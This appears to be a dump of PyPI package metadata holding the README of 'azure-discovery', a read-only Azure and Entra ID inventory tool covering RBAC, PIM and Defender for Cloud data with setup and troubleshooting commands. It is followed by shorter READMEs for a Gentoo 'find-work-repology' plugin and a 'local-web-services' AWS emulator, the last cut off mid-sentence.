subscriptions via Azure Resource Graph. You can disable this to focus on other aspects like Entra ID, RBAC, or PIM data only: ```bash # Discover only Entra ID objects and RBAC assignments without Azure resources azure-discovery discover \ --tenant-id <tenant-guid> \ --no-include-azure-resources \ --include-entra \ --include-rbac-assignments ``` Subscriptions are resolved the same way for CLI, API, and Python: when `include_azure_resources` is false, the orchestrator still resolves the subscription list (from request `subscriptions` or from Azure) so RBAC, PIM, and Defender phases have scope. When using `--no-include-azure-resources` with RBAC, PIM, or Defender for Cloud, pass `--subscription` (or set `subscriptions` in your config or API request body) so those phases know which subscriptions to enumerate; otherwise the tool resolves subscriptions from Azure (or fails if none are accessible). This is useful when you want to: - Analyze only identity and access management data without resource inventory - Audit RBAC assignments or PIM eligibilities independently of resource discovery - Reduce discovery time and output size when resource data isn't needed ## Entra ID discovery When `include_entra` is enabled, Azure Discovery queries Microsoft Graph and emits normalized nodes using a `graph://...` ID namespace to avoid collisions with Azure Resource Manager (ARM) IDs. ### Entra node types Typical Entra collections include: - Microsoft.Graph/Organization and Microsoft.Graph/Domain - Microsoft.Graph/User and Microsoft.Graph/Group - Microsoft.Graph/Application and Microsoft.Graph/ServicePrincipal - Microsoft.Graph/ConditionalAccessPolicy - Microsoft.Graph/RiskyUser ### Entra relationships When `include_relationships` is enabled, Azure Discovery can emit bounded edges: - `has_domain` (organization -> domain) - `has_member` (group -> member) when group membership expansion is enabled - `has_owner` (application/servicePrincipal -> owner) when ownership expansion is enabled - `appId` (servicePrincipal -> application) correlation edges when both are enumerated All relationship expansion is capped by request parameters (see CLI options below) to avoid blowing up graphs in large tenants. ## Azure RBAC discovery When `include_rbac_assignments` or `include_rbac_definitions` is enabled, Azure Discovery enumerates Azure role-based access control (RBAC) data: - **Role assignments**: Who has what access to which resources (active assignments) - **Role definitions**: Built-in and custom role definitions with their permissions - **RBAC relationships**: Principal → RoleAssignment → Resource graph edges (when `include_relationships` is enabled) This capability is useful for security posture assessment, access reviews, and understanding the permission landscape across your Azure estate. ## PIM (Privileged Identity Management) discovery When `include_pim` is enabled, Azure Discovery enumerates eligible role assignments that users can activate on-demand: - **Entra ID role eligibilities**: Eligible assignments for directory roles (Global Administrator, User Administrator, etc.) - **Azure resource role eligibilities**: Eligible assignments for Azure resource roles (Owner, Contributor, etc. at subscription/resource group/resource scope) - **Eligibility schedules**: Time-bound eligibility windows with start/end dates - **PIM relationships**: Principal → RoleEligibility → Resource/RoleDefinition graph edges (when `include_relationships` is enabled) PIM eligibilities represent just-in-time (JIT) access that must be activated before use. This differs from standard RBAC assignments which are always active. PIM discovery helps identify: - Standing privileged access (who is eligible for high-privilege roles) - Dormant privileged accounts (eligibilities that haven't been activated recently) - Compliance with least-privilege policies (eligibilities with appropriate time boundaries) - Shadow admins (users with eligible assignments to privileged roles) ### PIM node types - **Microsoft.Graph.PIM/roleEligibilitySchedules**: Entra ID role eligibilities (eligible for directory roles) - **Microsoft.Graph.PIM/roleEligibilityScheduleRequests**: Pending/active Entra role eligibility requests - **Microsoft.Authorization/roleEligibilitySchedules**: Azure resource role eligibilities (eligible for ARM roles) ### PIM relationships When `include_relationships` is enabled, Azure Discovery creates edges between PIM eligibilities and related entities: - `has_eligible_role` (principal -> eligibility): Links users/groups/service principals to their eligible role assignments - `eligible_for` (eligibility -> resource): Links Azure resource eligibilities to the resources they grant access to - `eligible_via_role` (eligibility -> role definition): Links eligibilities to the role definitions they represent ### PIM filtering You can filter PIM eligibilities by scope to focus on specific subscriptions or resource groups: ```bash # Only eligibilities for a specific subscription azure-discovery discover \ --tenant-id <tenant-guid> \ --include-pim \ --pim-scope "/subscriptions/<sub-id>" # Only eligibilities for a specific resource group azure-discovery discover \ --tenant-id <tenant-guid> \ --include-pim \ --pim-scope "/subscriptions/<sub-id>/resourceGroups/<rg-name>" ``` This capability is useful for security audits, compliance reviews, privileged access management, and identifying potential attack paths through JIT privilege escalation. ### PIM Permissions Setup PIM discovery requires specific Microsoft Graph API permissions and licensing. For detailed setup instructions, see: **[PIM Permissions Guide](docs/PIM_PERMISSIONS_GUIDE.md)** - Complete guide for: - Service principal configuration - User permission setup - Licensing requirements - Azure resource PIM onboarding - Troubleshooting permission issues Quick reference for common scenarios: - **Interactive users**: Requires **Global Reader** or **Privileged Role Administrator** Entra ID role + `RoleManagement.Read.Directory` consent - **Service principals**: Requires `RoleManagement.Read.Directory` application permission + admin consent - **Licensing**: Requires **Entra ID P2** or **Entra ID Governance** license ## Defender for Cloud discovery When `include_defender_cloud` is enabled, Azure Discovery enumerates security findings from Microsoft Defender for Cloud: - **Security alerts**: Active threats, suspicious activity, and security incidents detected across your Azure resources. Each alert includes MITRE ATT&CK tactics and techniques, affected resources, remediation steps, and severity ratings. - **Security assessments**: Vulnerability findings, compliance recommendations, and security best practices. Assessments identify configuration gaps and provide remediation guidance. - **Secure scores**: Subscription-level security posture scores that quantify your current security state (e.g., 42.5/100). ### Defender node types - **Microsoft.Security/alerts**: Security alerts with properties like severity (High, Medium, Low, Informational), status (Active, Resolved, Dismissed), MITRE ATT&CK techniques, and affected resources. - **Microsoft.Security/assessments**: Security assessments with severity, status (Healthy, Unhealthy, NotApplicable), categories (Data, Network, Compute, etc.), and remediation descriptions. - **Microsoft.Security/secureScores**: Subscription security posture scores with current/max values and percentage. ### Defender relationships When `include_relationships` is enabled, Azure Discovery creates edges between security findings and affected resources: - `affects` (alert -> resource): Links security alerts to the VMs, storage accounts, or other resources they impact. - `affects` (assessment -> resource): Links security assessments to the resources that have vulnerabilities or misconfigurations. These relationships enable security-focused graph queries like "Show me all High severity alerts affecting production VMs" or "Which resources have the most unhealthy assessments?" ### Defender filtering You can filter security findings to reduce noise and focus on critical issues: ```bash # Only High and Critical severity alerts that are Active azure-discovery discover \ --tenant-id <tenant-guid> \ --include-defender-cloud \ --defender-alert-severity High --defender-alert-severity Critical \ --defender-alert-status Active # Only Unhealthy assessments (skip Healthy and NotApplicable) azure-discovery discover \ --tenant-id <tenant-guid> \ --include-defender-cloud \ --defender-assessment-status Unhealthy # Alerts only (disable assessments and scores) azure-discovery discover \ --tenant-id <tenant-guid> \ --include-defender-cloud \ --no-defender-include-assessments \ --no-defender-include-secure-scores ``` Config file example (YAML): ```yaml include_defender_cloud: true defender_config: include_security_alerts: true include_security_assessments: true include_secure_scores: true alert_severity_filter: - High - Critical alert_status_filter: - Active assessment_status_filter: - Unhealthy ``` This capability is useful for security operations, vulnerability management, compliance tracking, and prioritizing remediation efforts based on actual threats and exposures. ## Prerequisites - Python 3.11+ - Azure CLI 2.60+ (optional, used when `--prefer-cli` is set) or service principal credentials exported as `AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, and `AZURE_CLIENT_SECRET` - Azure Resource Graph access (Reader or above on the subscriptions you plan to scan) - Microsoft Graph access (only required when using `--include-entra`) - Network egress to `management.azure.com` and `api.azure.com` (and to the Graph endpoint for the cloud you select) ## Required permissions ### Azure Resource Graph (ARM) | Capability | Minimum RBAC role | Scope recommendation | | ---------- | ----------------- | -------------------- | | Run Resource Graph queries | `Reader`, `Resource Graph Reader`, or any custom role with `Microsoft.ResourceGraph/*/read` | Every subscription you plan to inventory or the parent management group | | Auto-discover subscriptions (when `--subscription` is omitted) | `Reader` on the management group or `Directory.Read.All` consent for service principals | Tenant root (`/providers/Microsoft.Management/managementGroups/<root>`) | | Register Microsoft.ResourceGraph (one-time) | `Contributor` or `Owner` | Each subscription being scanned | | Read role assignments | `Reader` or `Role Based Access Control Administrator (read-only)` | Subscription or management group | | Read role definitions | `Reader` | Subscription | | Read PIM eligible assignments (Entra roles) | N/A (requires Microsoft Graph permissions - see below) | Tenant | | Read PIM eligible assignments (Azure resources) | `Reader` or `Role Based Access Control Administrator (read-only)` | Subscription or management group | | Read Defender for Cloud alerts and assessments | `Reader` or `Security Reader` | Subscription | The tool never mutates resources, but it cannot enumerate subscriptions or call Resource Graph unless the identity has at least `Reader` at the relevant scope. Grant the narrowest scope that still covers your target estate. ### Microsoft Graph (Entra) Azure Discovery uses Microsoft Graph delegated permissions when running as a signed-in user (for example, Azure CLI/device code flows), and application permissions when running headless (service principal / managed identity). The following table is a practical starting point for *read-only* discovery. Always follow least privilege, and prefer narrower resource-specific permissions over broad directory-wide permissions where possible. | Discovery area | Typical endpoints | Delegated permissions | Application permissions | Notes | | --- | --- | --- | --- | --- | | Users | `/users` | `User.ReadBasic.All` or `User.Read.All` (or `Directory.Read.All`) | `User.Read.All` (or `Directory.Read.All`) | Guests can't call `/users`. | | Groups + members | `/groups`, `/groups/{id}/members` | `Group.Read.All` + `GroupMember.Read.All` (or `Directory.Read.All`) | `Group.Read.All` + `GroupMember.Read.All` (or `Directory.Read.All`) | Hidden memberships may require additional permissions depending on tenant settings. | | Applications + service principals | `/applications`, `/servicePrincipals` | `Application.Read.All` (or `Directory.Read.All`) | `Application.Read.All` (or `Directory.Read.All`) | Needed for enumerating apps/SPs and owner expansion. | | Conditional Access policies | `/identity/conditionalAccess/policies` | `Policy.Read.All` | `Policy.Read.All` | Delegated access typically requires an Entra role such as Conditional Access Administrator or similar security read roles. | | Risky users (Identity Protection) | `/identityProtection/riskyUsers` | `IdentityRiskyUser.Read.All` | `IdentityRiskyUser.Read.All` | Requires Entra ID Identity Protection licensing (commonly P2). | | PIM Entra role eligibilities | `/roleManagement/directory/roleEligibilitySchedules` | `RoleEligibilitySchedule.Read.Directory` or `RoleManagement.Read.Directory` or `RoleManagement.Read.All` | `RoleEligibilitySchedule.Read.Directory` or `RoleManagement.Read.Directory` or `RoleManagement.Read.All` | Requires Entra ID P2 or Entra ID Governance licensing. Delegated access typically requires an Entra role such as Privileged Role Administrator or Global Reader. | References: - List users permissions: https://learn.microsoft.com/en-us/graph/api/user-list?view=graph-rest-1.0 - Conditional Access policy list permissions: https://learn.microsoft.com/en-us/graph/api/conditionalaccessroot-list-policies?view=graph-rest-1.0 - Identity Protection API tutorial (role + delegated scope examples): https://learn.microsoft.com/en-us/graph/tutorial-riskdetection-api - PIM API overview: https://learn.microsoft.com/en-us/graph/api/resources/privilegedidentitymanagementv3-overview - Role eligibility schedules API: https://learn.microsoft.com/en-us/graph/api/rbacapplication-list-roleeligibilityschedules ### Granting Microsoft Graph permissions for PIM PIM enumeration requires specific Microsoft Graph API permissions. Follow these steps to grant permissions: #### For Service Principals (Application Permissions) 1. **Register an application** in Entra ID (if not already done): ```bash az ad app create --display-name "Azure Discovery PIM" ``` 2. **Grant Microsoft Graph API permissions**: ```bash # Get the application ID APP_ID=$(az ad app list --display-name "Azure Discovery PIM" --query "[0].appId" -o tsv) # Grant RoleManagement.Read.Directory permission (read PIM eligibilities) az ad app permission add \ --id $APP_ID \ --api 00000003-0000-0000-c000-000000000000 \ --api-permissions 741c54c2-4c95-4eda-87e4-e8b36d2d93bb=Role ``` 3. **Admin consent** (requires Global Administrator or Privileged Role Administrator): ```bash az ad app permission admin-consent --id $APP_ID ``` 4. **Create service principal and secret**: ```bash az ad sp create --id $APP_ID az ad sp credential reset --id $APP_ID --years 1 ``` 5. **Assign Entra ID role** (for delegated scenarios or enhanced permissions): - Assign **Privileged Role Administrator** or **Global Reader** role to the service principal - This is in addition to the API permissions above #### For Users (Delegated Permissions) 1. **Entra ID role assignment**: Assign one of these roles to the user account: - **Privileged Role Administrator** (can read all PIM configurations) - **Global Reader** (read-only access to all tenant data including PIM) - **Security Reader** (read security-related data including some PIM data) 2. **API permissions**: When using delegated flow (e.g., `az login`), consent to: - `RoleManagement.Read.Directory` or - `RoleEligibilitySchedule.Read.Directory` 3. **Interactive consent** (first run): ```bash az login --scope https://graph.microsoft.com/RoleManagement.Read.Directory ``` #### Licensing Requirements **CRITICAL**: PIM functionality requires one of the following licenses: - **Entra ID P2** (formerly Azure AD Premium P2) - **Entra ID Governance** (includes PIM capabilities) - **Microsoft 365 E5** (includes Entra ID P2) Without proper licensing, the PIM APIs will return 403 Forbidden even with correct permissions. ### Service principal flow (CLI based) ``` az ad sp create-for-rbac \ --name azure-discovery-sp \ --role "Reader" \ --scopes /subscriptions/<sub-id-1> /subscriptions/<sub-id-2> \ --years 1 az role assignment create \ --assignee <appId> \ --role "Resource Graph Reader" \ --scope /subscriptions/<sub-id-1> ``` Export the emitted `appId`, `tenant`, and `password` as `AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, and `AZURE_CLIENT_SECRET`. Repeat the role assignment command for every subscription or assign at the management group scope (`/providers/Microsoft.Management/managementGroups/<mg-id>`) to cover multiple subscriptions at once. ### User-assigned permissions (Portal) 1. Open Azure Portal → **Subscriptions** → select each target subscription. 2. Navigate to **Access control (IAM)** → **Add** → **Add role assignment**. 3. Pick the `Reader` (or `Resource Graph Reader`) role, then select the user or managed identity that will run AzureDiscovery. 4. If you want automatic subscription discovery, repeat the assignment at the tenant root management group (visible under **Management groups**). Users need the **Azure RBAC Reader** role there. ### Provider registration and validation Run the following once per subscription to ensure the Resource Graph service is registered and the identity can query it: ``` az account set --subscription <sub-id> az provider register --namespace Microsoft.ResourceGraph az graph query -q "Resources | take 1" ``` Successful output from `az graph query` confirms both the provider registration and the assigned role. If the command fails with `AuthorizationFailed`, double-check the scope of the role assignments and replicate them for every subscription you intend to scan. ## Configuration reference | Option | Description | | ------ | ----------- | | `--config` | Path to JSON/TOML/YAML config file (AzureDiscoveryRequest shape). CLI flags override file values. | | `--tenant-id` | Required Entra ID tenant GUID. | | `--environment` | Azure cloud (`azure_public`, `azure_gov`, `azure_china`, `azure_germany`, `azure_stack`). | | `--subscription/-s` | Repeatable flag to scope runs to explicit subscription IDs. Omit to auto-resolve. When using `--no-include-azure-resources`, pass this so RBAC/PIM/Defender know which subscriptions to enumerate. | | `--include-azure-resources/--no-include-azure-resources` | Include Azure resources from Resource Graph (default: true). When false, only Entra/RBAC/PIM/Defender data is collected; subscriptions are still resolved from `--subscription` or Azure. | | `--include-entra` | Include Entra ID resources via Microsoft Graph. | | `--include-rbac-assignments` | Include Azure role assignments in discovery. | | `--include-rbac-definitions` | Include Azure role definitions (built-in and custom). | | `--rbac-scope` | Filter role assignments by scope (repeatable). | | `--include-pim` | Include PIM (Privileged Identity Management) eligible role assignments. | | `--pim-include-entra-eligibilities/--no-pim-include-entra-eligibilities` | Include Entra ID role eligibilities (default: true when PIM enabled). | | `--pim-include-entra-requests` | Include pending/active Entra role eligibility requests. | | `--pim-include-azure-resource-eligibilities/--no-pim-include-azure-resource-eligibilities` | Include Azure resource role eligibilities (default: true when PIM enabled). | | `--pim-scope` | Filter PIM eligibilities by scope (repeatable). | | `--include-defender-cloud` | Include Defender for Cloud security findings (alerts, assessments, scores). | | `--defender-include-alerts/--no-defender-include-alerts` | Include security alerts from Defender for Cloud (default: true when defender enabled). | | `--defender-include-assessments/--no-defender-include-assessments` | Include security assessments (default: true when defender enabled). | | `--defender-include-secure-scores/--no-defender-include-secure-scores` | Include secure scores (default: true when defender enabled). | | `--defender-alert-severity` | Filter alerts by severity: High, Medium, Low, Informational (repeatable). | | `--defender-alert-status` | Filter alerts by status: Active, Resolved, Dismissed (repeatable). | | `--defender-assessment-severity` | Filter assessments by severity: High, Medium, Low (repeatable). | | `--defender-assessment-status` | Filter assessments by status: Healthy, Unhealthy, NotApplicable (repeatable). | | `--scale-controls/--no-scale-controls` | Enable adaptive rate control for large tenants (default: enabled). | | `--scale-initial-rps` | Initial requests per second for adaptive rate control (default: 10.0). | | `--scale-max-concurrent-batches` | Maximum concurrent batch operations (default: 5). | | `--scale-initial-batch-size` | Initial batch size for paginated operations (default: 1000). | | `--entra-include-organization/--no-entra-include-organization` | Include organization (tenant root) node. | | `--entra-include-domains/--no-entra-include-domains` | Include tenant domains. | | `--entra-include-users/--no-entra-include-users` | Include Entra users. | | `--entra-include-groups/--no-entra-include-groups` | Include Entra groups. | | `--entra-include-applications/--no-entra-include-applications` | Include Entra applications. | | `--entra-include-conditional-access-policies/--no-entra-include-conditional-access-policies` | Include conditional access policies (requires permissions). | | `--entra-include-risky-users/--no-entra-include-risky-users` | Include risky users (requires permissions). | | `--entra-group-membership-max-groups` | Max groups to expand membership for (0 disables expansion). | | `--entra-group-membership-max-members-per-group` | Max members per group during expansion (0 disables expansion). | | `--entra-ownership-max-apps` | Max applications to expand owners for (0 disables expansion). | | `--entra-ownership-max-owners-per-app` | Max owners per app during expansion (0 disables expansion). | | `--entra-sp-ownership-max-sps` | Max service principals to expand owners for (0 disables SP ownership expansion). | | `--entra-sp-ownership-max-owners-per-sp` | Max owners per service principal during expansion (0 disables expansion). | | `--include-relationships/--no-include-relationships` | Include inferred and expanded relationships/edges (Graph expansions require this). | | `--graph-total-max-objects` | Maximum total objects across all Graph collections (0 = unlimited). | | `--entra-max-objects` | Maximum objects per Entra collection (0 = unlimited). | | `--include-type` / `--exclude-type` | Filter resource types (case-insensitive). | | `--resource-group` | Restrict discovery to named resource groups. | | `--required-tag` | Enforce tag key=value pairs (repeatable). | | `--prefer-cli` | Place Azure CLI credentials at the front of the chain. | | `--visualization-output-dir` | Directory for PyVis HTML output (default `artifacts/graphs`). | | `--visualization-file` | Override the generated HTML file name. | | `--output/-o` | Write JSON output to file instead of stdout. | | `--quiet/-q` | Suppress all logs except errors. | | `--format/-f` | Output format: `json` (default) or `json-compact`. | | `--preview-request/--dry-run` | Print the constructed discovery request JSON and exit (no discovery). | | `--validate-auth` | Run a preflight auth check (token acquisition for ARM and Graph) and exit. Use `--probe-connectivity` to also validate connectivity. | Subcommands: `discover` (run discovery), `version` (print package version and exit). Programmatic workflows can instantiate `AzureDiscoveryRequest` directly and call `orchestrator.run_discovery`, receiving an `AzureDiscoveryResponse` that contains resolved subscriptions, normalized nodes, inferred relationships, and an optional `html_report_path`. ### Output and logging separation By default, the CLI writes JSON results to stdout and logs to stderr. This allows clean piping: ```bash # Pipe JSON output to jq for filtering azure-discovery discover --tenant-id <id> | jq '.discovered_subscriptions' # Write output to file and suppress logs azure-discovery discover --tenant-id <id> --output results.json --quiet # Compact JSON output for scripting azure-discovery discover --tenant-id <id> --format json-compact ``` ## Development ### Quick start ```bash # Install with development dependencies make install-dev # Run tests make test # Format code make format # Run linting make lint # Type checking make typecheck # Generate coverage report make coverage ``` ### Available make commands Run `make help` to see all available commands: - `make install` - Install package dependencies - `make install-dev` - Install with development dependencies - `make test` - Run tests with pytest - `make lint` - Run ruff linter - `make format` - Format code with ruff - `make typecheck` - Run mypy type checking - `make coverage` - Generate test coverage report - `make clean` - Remove build artifacts and cache - `make run-api` - Run FastAPI server locally ### Pre-commit hooks Install pre-commit hooks to automatically run linting and formatting on commit: ```bash pip install pre-commit pre-commit install ``` This will run ruff formatting, linting, and mypy type checking before each commit. ### Environment variables Copy `.env.example` to `.env` and configure your Azure credentials: ```bash cp .env.example .env # Edit .env with your credentials ``` For detailed contributing guidelines, see [CONTRIBUTING.md](CONTRIBUTING.md). ## Troubleshooting ### General Issues - **`AzureClientError: Unable to enumerate subscriptions`** – ensure the identity has at least `Reader` on one subscription and that the Resource Graph service is registered (`az provider register --namespace Microsoft.ResourceGraph`). - **`AuthorizationFailed` / `Forbidden` (ARM)** – confirm the identity has `Reader` (or `Resource Graph Reader`) on every subscription (or parent management group) you are scanning, and that your current Azure CLI context is pointing at a subscription you can read (`az account show`). - **`Resource Graph query failure`** – check that the tenant/subscription pair belongs to the same cloud you selected, and verify network egress to the relevant `resource_manager` endpoint (see `_ENVIRONMENT_MAP` in `azure_discovery.utils.azure_clients`). - **`403 Forbidden` / `Authorization_RequestDenied` / `Insufficient privileges` (Graph)** – this usually means required Microsoft Graph permissions were not admin-consented, or (for delegated runs) the signed-in user lacks the Entra admin role required for that dataset (commonly Conditional Access / Identity Protection). If you don't need those datasets, disable them with `--no-entra-include-conditional-access-policies` and/or `--no-entra-include-risky-users`. - **Risky users missing / empty** – the Identity Protection APIs require additional permissions and licensing (commonly Entra ID P2); if you don't have that, disable with `--no-entra-include-risky-users`. - **Defender for Cloud alerts/assessments empty** – verify Defender for Cloud is enabled on the subscription(s) being scanned. The tool gracefully handles subscriptions without Defender enabled (404 errors are logged as warnings). - **Preflight auth check (CLI)** – run `azure-discovery discover --tenant-id <tenant-guid> --validate-auth --probe-connectivity` to confirm the credential chain can acquire tokens for both ARM and Graph (note: this currently validates token acquisition only). - **`VisualizationError: Failed to render HTML graph`** – confirm the `--visualization-output-dir` path exists and is writable; the PyVis writer does not auto-create directories unless it has permissions on each parent. - **`401` or `interaction_required` errors** – when running non-interactively, use a service principal credential chain and set `AZURE_CLIENT_SECRET`; the default chain will otherwise attempt to launch an interactive browser flow. - **Empty graph output** – verify filters are not mutually exclusive (e.g., mixing include/exclude for the same type). - **No RBAC/PIM/Defender results when using `--no-include-azure-resources`** – the tool must know which subscriptions to enumerate. Pass `--subscription <sub-id>` (or set `subscriptions` in your config). If omitted, the tool resolves subscriptions from Azure; if that fails or returns none, RBAC/PIM/Defender phases run over zero subscriptions. ### PIM-Specific Issues - **`403 Forbidden` when enumerating Entra PIM eligibilities** – this indicates one or more permission/licensing issues: 1. **Missing Graph API permissions**: Ensure `RoleManagement.Read.Directory` or `RoleEligibilitySchedule.Read.Directory` is granted and admin-consented 2. **Missing Entra ID role**: For delegated scenarios, assign **Privileged Role Administrator** or **Global Reader** to the user 3. **Missing licensing**: PIM requires **Entra ID P2** or **Entra ID Governance** licensing - check your tenant's license status 4. **Verify permissions**: Run `az ad signed-in-user show` and check assigned roles, or use `az ad sp show --id <app-id>` for service principals - **`404 Not Found` when enumerating Azure Resource PIM eligibilities** – this means PIM is not configured for the subscription: 1. **Enable PIM for Azure resources**: In Entra ID → Privileged Identity Management → Azure resources → Discover resources 2. **Onboard subscription**: Select the subscription and click "Manage resource" to enable PIM 3. **Wait for propagation**: After enabling PIM, allow 5-10 minutes for the service to fully initialize - **PIM eligibilities returned but empty/zero results** – this is expected if no eligible assignments exist: 1. **Verify PIM assignments exist**: Check Entra ID → Privileged Identity Management → My roles / Azure resources to confirm eligible assignments 2. **Scope filtering**: If using `--pim-scope`, ensure the scope matches existing eligible assignments 3. **Role type filtering**: Eligible assignments are separate from active assignments - use both `--include-rbac-assignments` and `--include-pim` to see the complete picture - **`Failed to acquire Microsoft Graph token` for PIM** – authentication issue: 1. **Check authentication**: Run `az account show` to verify you're logged in 2. **Re-authenticate**: Run `az login --scope https://graph.microsoft.com/RoleManagement.Read.Directory` to explicitly consent 3. **Service principal**: Verify `AZURE_CLIENT_ID`, `AZURE_TENANT_ID`, and `AZURE_CLIENT_SECRET` are set correctly 4. **Token cache**: Try `az account clear` then `az login` again to refresh tokens - **PIM eligibilities missing for specific users** – check assignment configuration: 1. **Assignment type**: Only **eligible** assignments appear in PIM results (not active assignments) 2. **Expired eligibilities**: Check the `endDateTime` in the eligibility schedule - expired eligibilities are still returned but marked with status 3. **Group-based eligibilities**: If the user is eligible via group membership, ensu
text/markdown
David Frazer <david.frazer336@gmail.com>
null
null
null
null
azure, resource-graph, discovery, inventory, sovereign-cloud, visualization
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Topic :: System :: Systems Administration" ]
[]
null
null
>=3.11
[]
[]
[]
[ "pydantic>=2.7", "fastapi>=0.110", "uvicorn>=0.30", "typer>=0.12", "pyvis>=0.3.2", "msgraph-sdk>=1.0", "pyyaml>=6.0", "azure-identity>=1.17", "azure-mgmt-resourcegraph>=8.0", "azure-mgmt-subscription>=3.1", "azure-mgmt-authorization>=4.0", "azure-mgmt-security>=7.0", "rich-transient>=0.1.1",...
[]
[]
[]
[ "Documentation, https://github.com/maravedi/AzureDiscovery#readme", "Repository, https://github.com/maravedi/AzureDiscovery", "Bug Tracker, https://github.com/maravedi/AzureDiscovery/issues" ]
twine/6.2.0 CPython/3.12.10
2026-02-19T22:06:26.389706
azure_discovery-0.1.9.tar.gz
137,766
ff/f5/2fe369d7490555f150e42053d67927ab51e454a6cdad30c537714bbdcb0c/azure_discovery-0.1.9.tar.gz
source
sdist
null
false
af764655253d6beb5515349f5510f439
aa31f334dbe658674eb02909eb8d77922e412fd50af9250c5cab53ac9dbee747
fff52fe369d7490555f150e42053d67927ab51e454a6cdad30c537714bbdcb0c
MIT
[ "LICENSE" ]
221
2.4
find-work-repology
1.0.1
Personal advice utility for Gentoo package maintainers: Repology plugin
<!-- SPDX-FileCopyrightText: 2024 Anna <cyber@sysrq.in> --> <!-- SPDX-License-Identifier: CC0-1.0 --> find-work-repology ================== [find-work][find-work] is a utility for Gentoo repository maintainers that helps them find ebuilds to improve. This plugin adds commands that use Repology to find work. [find-work]: https://find-work.sysrq.in/ Installing ---------- ### Gentoo ```sh eselect repository enable guru emaint sync -r guru emerge dev-util/find-work-repology ``` ### Other systems `pip install find-work-repology --user` Packaging --------- You can track new releases using an [atom feed][atom] provided by PyPI. [atom]: https://pypi.org/rss/project/find-work-repology/releases.xml Contributing ------------ Patches and pull requests are welcome. Please use either [git-send-email(1)][1] or [git-request-pull(1)][2], addressed to <cyber@sysrq.in>. If you prefer GitHub-style workflow, use the [mirror repo][gh] to send pull requests. Your commit message should conform to the following standard: ``` file/changed: Concice and complete statement of the purpose This is the body of the commit message. The line above is the summary. The summary should be no more than 72 chars long. The body can be more freely formatted, but make it look nice. Make sure to reference any bug reports and other contributors. Make sure the correct authorship appears. ``` [1]: https://git-send-email.io/ [2]: https://git-scm.com/docs/git-request-pull [gh]: http://github.com/cybertailor/find-work-plugins IRC --- You can join the `#find-work` channel either on [Libera Chat][libera] or [via Matrix][matrix]. [libera]: https://libera.chat/ [matrix]: https://matrix.to/#/#find-work:sysrq.in License ------- WTFPL
text/markdown
null
Anna <cyber@sysrq.in>
null
null
null
gentoo, ebuild, repository, maintainer, repology
[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Framework :: Pydantic", "Framework :: Pydantic :: 2", "Intended Audience :: Developers", "License :: DFSG approved", "Operating System :: POSIX", "Programming Language :: Python", "Programming Language :: Python :: 3", "Prog...
[]
null
null
>=3.11
[]
[]
[]
[ "click", "click-aliases", "find-work<2,>=1", "gentoopm<2", "pydantic<3,>=2", "repology-client<2,>=0.0.2", "sortedcontainers" ]
[]
[]
[]
[ "Changelog, https://git.sysrq.in/find-work-plugins/plain/find-work-repology/ChangeLog", "Home, https://find-work.sysrq.in/", "Issues, https://bugs.sysrq.in/enter_bug.cgi?product=Software&component=find-work", "Source, https://git.sysrq.in/find-work-plugins" ]
uv/0.9.15 {"installer":{"name":"uv","version":"0.9.15","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"'Gentoo'","version":"'2.18'","id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:05:59.239423
find_work_repology-1.0.1.tar.gz
7,546
7c/51/e0d0a6a036fe2269497a5d38fb5995678cd8fae471b631d44d5f52ca5c06/find_work_repology-1.0.1.tar.gz
source
sdist
null
false
bc983b36116a2d6c01c9f358a04641b6
77b08912668d855d094a545e76e20cd08250bd9f26b4b476bdbf4bc142aa0051
7c51e0d0a6a036fe2269497a5d38fb5995678cd8fae471b631d44d5f52ca5c06
null
[]
223
2.4
local-web-services
0.17.2
Run AWS CDK applications locally - accelerate development with agentic code editors
# local-web-services Run your AWS CDK and Terraform applications locally. local-web-services reads your CDK cloud assembly or Terraform configuration and spins up local emulations of API Gateway, Lambda, DynamoDB, SQS, SNS, S3, Step Functions, Cognito, EventBridge, SSM Parameter Store, Secrets Manager, and more — so you can develop and test without deploying to AWS. ## Try It Out ### CDK Sample Project Clone the [CDK sample project](https://github.com/local-web-services/sample-project) — a serverless order processing system with API Gateway, Lambda, DynamoDB, SQS, S3, SNS, and Step Functions: ```bash git clone https://github.com/local-web-services/sample-project.git cd sample-project npm install npx cdk synth ``` Start the local environment: ```bash uvx --from local-web-services ldk dev ``` ### Terraform Sample Project Clone the [Terraform sample project](https://github.com/local-web-services/sample-project-terraform) — the same order processing system built with Terraform: ```bash git clone https://github.com/local-web-services/sample-project-terraform.git cd sample-project-terraform terraform init ``` Start the local environment, then apply: ```bash # Terminal 1: Start local services uvx --from local-web-services ldk dev # Terminal 2: Apply Terraform against local endpoints terraform apply -auto-approve ``` ### Interact with Local Services Open http://localhost:3000/_ldk/gui in your browser to see the GUI — you can watch request logs, browse DynamoDB tables, inspect S3 buckets, and interact with all your resources as you run through the steps below. In another terminal, create an order: ```bash uvx --from local-web-services lws apigateway test-invoke-method \ --resource /orders \ --http-method POST \ --body '{"customerName": "Alice", "items": ["widget", "gadget"], "total": 49.99}' ``` Start the order processing workflow: ```bash uvx --from local-web-services lws stepfunctions start-execution \ --name OrderWorkflow \ --input '{"orderId": "<ORDER_ID>", "items": ["widget", "gadget"], "total": 49.99}' ``` Check the workflow status: ```bash uvx --from local-web-services lws stepfunctions describe-execution --execution-arn <EXECUTION_ARN> ``` Retrieve the order: ```bash uvx --from local-web-services lws apigateway test-invoke-method \ --resource /orders/<ORDER_ID> \ --http-method GET ``` Store and retrieve configuration: ```bash uvx --from local-web-services lws ssm put-parameter \ --name /app/table-name --value orders --type String uvx --from local-web-services lws ssm get-parameter --name /app/table-name ``` Store and retrieve secrets: ```bash uvx --from local-web-services lws secretsmanager create-secret \ --name app/api-key --secret-string "my-secret-key" uvx --from local-web-services lws secretsmanager get-secret-value --secret-id app/api-key ``` Both sample projects include a full end-to-end test script (`test-orders.sh`) that runs all of these steps automatically. ## Installation ### Docker (recommended for CI and teams) Images are published to the GitHub Container Registry for `linux/amd64` and `linux/arm64`: ```bash docker pull ghcr.io/local-web-services/local-web-services:latest ``` Mount your project directory and the Docker socket (required for Lambda 